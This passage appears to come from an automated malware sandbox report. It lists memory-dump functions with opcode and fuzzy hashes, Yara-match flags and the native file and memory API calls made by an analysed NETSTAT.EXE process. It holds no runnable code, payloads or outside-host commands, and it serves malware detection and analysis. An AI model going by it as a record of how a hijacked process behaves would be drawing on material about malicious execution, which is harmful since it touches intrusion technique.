Instruction Fuzzy Hash: 83E08C31A206819BCF12DF48C690F5EBBF9FB44B00F150048A6085B660C678ED00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9D, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359763a25d6c140d366a2369db04d2d4d4cfb794e04ad709bc632c39450fcc8c
Instruction ID: 9b459c16224fa1cc4df146a204b53e0601a9469b05086f9c46607b2ef8c7fbfd
Opcode Fuzzy Hash: 359763a25d6c140d366a2369db04d2d4d4cfb794e04ad709bc632c39450fcc8c
Instruction Fuzzy Hash: F9B09223AA610406E934296C78803B4E3B887C7224E1432A7E848B794048A7C87246CA

Uniqueness

Uniqueness Score: -1.00%

Function 0125AAB0, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: a0d9e23b0ac2636978aea18737cad769a5edcfb49c7afd3fcafa03d625bec502
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 4BD0C235262A81CFD6568B1DC5A5B1577A4BB44B44FC50590EA018B662E628D944CA10

Uniqueness

Uniqueness Score: -1.00%

Function 012735A1, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: de13dbddd34fcd44500129da7d50dfc0efa73f7d9e475a66bf37d7f8341ff53a
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: CFD022B1431182DEEB42EF18E2187FE7BB3FF08208F582069C60206852C33A4A0EF700

Uniqueness

Uniqueness Score: -1.00%

Function 0124DB40, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: dd16f0816d3ebbf725609b8d5a0b9ef7047da6fd3cdf60f142be1a36bdebb0ab
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: F2C08C302A0A42AFEB262F20CD11B113AA4BB21B05F4400A06700DA0F0EB78DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 012CA537, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 4dcafb65d772a94fd61caaa0bc1ae1f6b47c6657e29ad4af47266c2151347918
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: D8C08C33080248BBCB126F81CC00F267F2EFBA4B60F008010FA480B5B0C632E9B0EB84

Uniqueness

Uniqueness Score: -1.00%

Function 01263A1C, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: f61eb5f1a1a22de9c9e3f1ae7c1464e5c1e09be50e1aedc1a224051d4685f9ba
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 8CC08C32080288BBC7126E41DC00F127B2DE7A0B60F000020BA040A5A08532ECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 0124AD30, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 2e993f87d00cd400e3541068ddf4c638018c050a7b779f98883f3b273f46682c
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 48C02B330D0248BBC7136F45DD00F117F2DE7A0B60F000020F6040B6B1C93AECA0D588

Uniqueness

Uniqueness Score: -1.00%

Function 012576E2, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 2d68aa2716012ddcd972442401028a6c3ac80912781bd468396ce0c568c61f9f
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: ECC08C701B11825EEB2B570CCE60B303A54AB08608F88019CAF01094E2C37CA802C218

Uniqueness

Uniqueness Score: -1.00%

Function 012736CC, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 5a5de09a2eb51eb868eea524d0cee719c7433e7c504a58380233ae8004d37ef0
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: F4C02B701B0480FFD7156F30CD50F267298F700A21F6403547320454F0D538DC00E104

Uniqueness

Uniqueness Score: -1.00%

Function 01267D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: d6d1971a831c029f18041c7a7677c33e9c912c4afd3591480383c9a9c5f88a76
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 15B092353119418FDE16DF18C080B1533E8BB44A44F8404D0E400CBA21D329E8408900

Uniqueness

Uniqueness Score: -1.00%

Function 01272ACB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 54d81b363ba12f90e377ebc0f4eaba69977323a44830056f305bab5a4d4f80c9
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: B2B01232C20441CFCF42EF40C650B2DB331FB00750F064490940127930C238AD01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01289950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction ID: 55b245c4774fff5bd31f3c32b53e250a69cb2030c1eb2a28898523b998e4aa1f
Opcode Fuzzy Hash: ae1d975c13eb35d8e6a02b0d46bf2c3c8366c7933cc875760a5d76491d217f3f
Instruction Fuzzy Hash: 2B9002A121144803D64065AD49046070005A7D0342F51C011A2054555ECA698C517275

Uniqueness

Uniqueness Score: -1.00%

Function 012899D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction ID: a27f95909fda4a06beefd5e3ec88be40720a5833e881babd37bd534f5e2aaa79
Opcode Fuzzy Hash: 579d8a5e341441f91ad3c44db1b64d513e7a8e2e7c7a55520f00996c0f1576ae
Instruction Fuzzy Hash: CD9002A122104442D60461AD45047060045A7E1241F51C012A2144554CC5698C617275

Uniqueness

Uniqueness Score: -1.00%

Function 01289820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction ID: d37564ca91ffb5b6f3000bc868ffb9ac75ef7c3a2bfc320cf41f78373ed07cb7
Opcode Fuzzy Hash: 06a548c3287324d43e0b2d8ee657a483f45f737248bcbd3d8929c90a46c70d49
Instruction Fuzzy Hash: D390027125104802D64171AD45046060009B7D0281F91C012A0414554EC6958E56BBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0128B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction ID: 3292a8f28620182677fdf6b8c73a8441132875dff0ca23490809cded7454655e
Opcode Fuzzy Hash: e76edeadf818ac6c3294c7431a3d131b1d66eaee8e19b441dc718fc25609705d
Instruction Fuzzy Hash: 3C9002A1611184434A40B1AD49044065015B7E1341391C121A0444560CC6A88C55B3B5

Uniqueness

Uniqueness Score: -1.00%

Function 012898A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction ID: cc369f4d0b2b49a74958cc6483521319c10afffa143e0b561312284ba39113ad
Opcode Fuzzy Hash: 34bc4aab30e4f8d3b3df3f0a28269eb7e6ff8b112cd199b7a2dd61e736e21dc7
Instruction Fuzzy Hash: 2C90026131104802D60261AD45146060009E7D1385F91C012E1414555DC6658D53B272

Uniqueness

Uniqueness Score: -1.00%

Function 01289B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction ID: fc89964f84dc1d1deedef3ade0044a462d13c483d2ccfdf8815ea04677e76577
Opcode Fuzzy Hash: d360de76f28bfc3d17928999687ac4a67d43c235c08eceaae9393f58fe4c27a0
Instruction Fuzzy Hash: 7B90026125104C02D64071AD85147070006E7D0641F51C011A0014554DC6568D6577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0128A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction ID: 2ea973bf63c1073a6dc101484a55d0777e7a3b1389bb8e4e542fb2ccc70c56d7
Opcode Fuzzy Hash: 2b4b34da4df2f0047d6e630ba7f0ce8f7e6b2bd4323e18ba2a1b57b1c674295d
Instruction Fuzzy Hash: 9890027121148402D64071AD854460B5005B7E0341F51C411E0415554CC6558C56B371

Uniqueness

Uniqueness Score: -1.00%

Function 01289A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction ID: 3f3d4e4340ec6ca5b40dd7ea622566a1e52de60840261f53946de31568b8416c
Opcode Fuzzy Hash: f27fab49b4feaa6fc96905db34a2a7daf65080f436e9f48905b43ca2131c5c6c
Instruction Fuzzy Hash: C790027121144802D60061AD49087470005A7D0342F51C011A5154555EC6A5CC917671

Uniqueness

Uniqueness Score: -1.00%

Function 01289A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction ID: 6de7b09e11f4bde937728e77296bbb3770cfdeaf1a1e9dbcae4ee9d65d9125f0
Opcode Fuzzy Hash: c4f9f6366d427e49c807b1fd404540768369f8aeeb16d81ae24bae8ef76825be
Instruction Fuzzy Hash: 7D90026121148842D64062AD4904B0F4105A7E1242F91C019A4146554CC9558C557771

Uniqueness

Uniqueness Score: -1.00%

Function 01289520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction ID: 096516fbfd8d8627c4187fd63fdb0980958cbe97f129ae293f0b215069ba1cf2
Opcode Fuzzy Hash: 72822734350fdada456dd27289a29b129c4d2524846db11d4c8ced82baceff57
Instruction Fuzzy Hash: FA9002E1211184924A00A2AD8504B0A4505A7E0241B51C016E1044560CC5658C51B275

Uniqueness

Uniqueness Score: -1.00%

Function 0128AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction ID: 6166040d7ab21a6747734362be701002537853d9c123606764d0cc97a0b57558
Opcode Fuzzy Hash: 8aac67d2f52e2cf17fde3fda6c5b62b943430e65dde3864a3021efa4e59479ee
Instruction Fuzzy Hash: E3900271A1504412964071AD49146464006B7E0781B55C011A0504554CC9948E5573F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction ID: 35d6462f455225478e0400d43ca134b68c5169b83024af8bfe5c9e38cfb62d1a
Opcode Fuzzy Hash: a74b4d0f4a222e0277a77587f529dc47c721e5c5b2ac4e65710e7ab4a1b09c82
Instruction Fuzzy Hash: 71900265231044020645A5AD070450B0445B7D6391391C015F1406590CC6618C657371

Uniqueness

Uniqueness Score: -1.00%

Function 012895F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction ID: 88ee441ebc56b42c6ec29b732888c388aa81bbf13d4167ac8ce6406e5a3c82d5
Opcode Fuzzy Hash: 35a6e1e9e03ae7d474f700c1ecb00c6c42ef270da222ed5e825f1e079a5ad9b6
Instruction Fuzzy Hash: 3C90027121104C02D60461AD49046860005A7D0341F51C011A6014655ED6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 01289730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction ID: c02eb384e13b1a163e52b060ab297b892eafae536cc0147425fcf321b18e7e12
Opcode Fuzzy Hash: 49110d957a243031018e0ed50f675d337a21a956db3af4d9e54f5f8d73d8f2df
Instruction Fuzzy Hash: 8390026161504802D64071AD55187060015A7D0241F51D011A0014554DC6998E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 0128A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction ID: 05ee7e136acb83989eaa4c5a6da42dd61bc8e9f033809b8e751e3b4db00ea7b4
Opcode Fuzzy Hash: b3027623789b0436ceb27fd73614fb15fa3aa79cba58a02f2c8cd584cd17a631
Instruction Fuzzy Hash: 64900271311044529A00A6ED5904A4A4105A7F0341B51D015A4004554CC5948C617271

Uniqueness

Uniqueness Score: -1.00%

Function 01289760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction ID: c9fb50cc9406ee231df931c86ba8b2679a9a2fa5f985ead5ac4f3dae396ce760
Opcode Fuzzy Hash: 02827767386bf199e2b19a8b4e334fe8797c36af615f2e9a0b1f8b6631bf6bd2
Instruction Fuzzy Hash: 8090027121104803D60061AD56087070005A7D0241F51D411A0414558DD6968C517271

Uniqueness

Uniqueness Score: -1.00%

Function 0128A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction ID: 460e92a096b1efa66f0129c5603cedab66c699faf4fcd468090a0f2b65dcbe5c
Opcode Fuzzy Hash: 4748241a58c3f6eeea4b2e9ee5bfb06598f59e40ecd30d1527855de5d2598c32
Instruction Fuzzy Hash: 2C90027521508842DA0065AD5904A870005A7D0345F51D411A041459CDC6948C61B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction ID: 6ab0774e6f7e16d6a4968ba1b35f37d2a021952be789279c9fb48fbcdf7f9f67
Opcode Fuzzy Hash: 4e94fecf006963660320250b47145f88d28d29c725c47d717c4a435656b61784
Instruction Fuzzy Hash: 7590026121508842D60065AD5508A060005A7D0245F51D011A1054595DC6758C51B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction ID: bca8c70a8096396c2c5a38222073e7ae50ea156f6e52ca463383e97a30778008
Opcode Fuzzy Hash: e1a8048486f9a89bc6a0a008b7b5a42dba6833d2b018ad8c32b08d590b4f7773
Instruction Fuzzy Hash: 1390027161504C02D65071AD45147460005A7D0341F51C011A0014654DC7958E5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 01289650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction ID: e150d180d1b42b9c51731b0410115260570e76b926b6c729466ae51ccc16f187
Opcode Fuzzy Hash: a2d4b095c14d26d73b3f7cc3a82833e760916df81b25a658add1337f9fa20c9a
Instruction Fuzzy Hash: 3A90027121508C42D64071AD4504A460015A7D0345F51C011A0054694DD6658D55B7B1

Uniqueness

Uniqueness Score: -1.00%

Function 012896D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction ID: 7be6b7cee0d34b7634e105b03a7e886bb4a5c25decebcc23522e5fee726d0185
Opcode Fuzzy Hash: 61b4f104af15f4210cbae3bc43749fbb48197c868b32b9396a8a8ff0cd8c10ff
Instruction Fuzzy Hash: 3D90027121104C42D60061AD4504B460005A7E0341F51C016A0114654DC655CC517671

Uniqueness

Uniqueness Score: -1.00%

Function 01289670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c1446ab3ffeb69ee43cb1c6bdfe0b14f3165f57da4655a3a49fea3960b9434fb
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 012DFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012DFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 012DFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 012DFE2B

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction ID: 44578b75eefd489dd0ea1b65be253fe5a2d0157e6163d05547f4ae54bd2bf8ca
Opcode Fuzzy Hash: 9755973dc2692c324a342affc4ef7053481778fa8fd47ece74ac496acbf1182e
Instruction Fuzzy Hash: CCF0F672210202BFE7241A45DC02F33BF6AEB84B30F254314F628561D1EAA2F83087F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NETSTAT.EXE PID: 6848 Parent PID: 3472 NETSTAT.EXECOMMON

Executed Functions

Function 010381AC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01033B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01033B87,007A002E,00000000,00000060,00000000,00000000), ref: 010381FD

Strings

.z`, xrefs: 010381ED, 010381F8

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 1b7615558fd32a95e4270024564ea4701298f0d4fa00bbce8cbb19e8680fc3d3
Instruction ID: 247d3e867935048c3349768d54011884faabe4b6507c8a439e21b2ffaa7b80a4
Opcode Fuzzy Hash: 1b7615558fd32a95e4270024564ea4701298f0d4fa00bbce8cbb19e8680fc3d3
Instruction Fuzzy Hash: A301BDB2245208ABCB08DF88DC85EEB77EDAF8C754F158248BA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 010381B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01033B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01033B87,007A002E,00000000,00000060,00000000,00000000), ref: 010381FD

Strings

.z`, xrefs: 010381ED, 010381F8

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 49be616e795fc438ec2a29eb4fb772923f80850ffdd11a8f8894c5d1c328ea35
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: FBF0B2B2204208ABCB08DF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 01038260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(01033D42,5E972F59,FFFFFFFF,01033A01,?,?,01033D42,?,01033A01,FFFFFFFF,5E972F59,01033D42,?,00000000), ref: 010382A5

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: dbc5fc2c7ac01a85d947621e84ca462c686717eda6c1b9fced92319b43c4f860
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: A2F0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158249BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103838A, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01022D11,00002000,00003000,00000004), ref: 010383C9

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 61ef7ae63e99fce518c81a56da3fc032ca74ea5d9f34940f0795c40826fe50ed
Instruction ID: 1cab09834139552f08378f608e542bcd468b551b40b64d7eec8883b9de181222
Opcode Fuzzy Hash: 61ef7ae63e99fce518c81a56da3fc032ca74ea5d9f34940f0795c40826fe50ed
Instruction Fuzzy Hash: E0F058B2200208BFDB14DF98CC81EEB77A9AF9C350F158259FE0897241C634E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01038390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01022D11,00002000,00003000,00000004), ref: 010383C9

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: e9b1f3993641c7fc98d0ee7fe852e04ad733fc63a8d7231668b6f4915b87c4b5
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
